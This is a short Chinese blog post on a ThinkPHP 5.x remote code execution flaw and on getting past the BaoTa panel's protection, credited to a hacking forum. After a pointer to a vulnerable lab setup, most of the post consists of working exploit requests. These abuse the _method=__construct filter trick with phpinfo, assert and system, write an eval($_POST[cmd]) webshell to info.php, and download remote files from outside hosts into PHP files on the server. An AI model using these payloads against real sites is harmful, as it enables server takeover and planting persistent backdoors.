ThinkPHP 5.x-远程代码执行漏洞以及绕过宝塔

W.r 514 次浏览 0

ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 使用的站长还是很多的.

姿势来源于土司论坛

使用composer搭建漏洞环境

项目地址:https://github.com/vulnspy/thinkphp-5.1.29/tree/master/html

国内使用替换源 不然会很慢

composer config -g repo.packagist composer https://packagist.phpcomposer.com

漏洞利用过程

执行以往的poc 具体参考之前发的文章

ThinkPHP 5.x-远程代码执行漏洞以及绕过宝塔

执行土司给出的姿势
ThinkPHP 5.x-远程代码执行漏洞以及绕过宝塔

写马过程

测试phpinfo

?s=captcha&test=1

POST数据: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

php7.0以下

?s=captcha&Test=print_r(file_put_contents(%27info.php%27,file_get_contents(%27http://www.baidu.com/xx.txt%27)))

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=print_r(file_put_contents(%27info.php%27,file_get_contents(%27http://www.baidu.com/xx.txt%27)))

未禁用执行函数

?s=captcha&Test=echo+^<?php+phpinfo();eval($_POST[cmd]);?^>+>>info.php

_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=test123

?s=captcha&Fuck=copy("http://xx.com/test.txt","test.php")

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=Fuck


发表评论 取消回复
表情 图片 链接 代码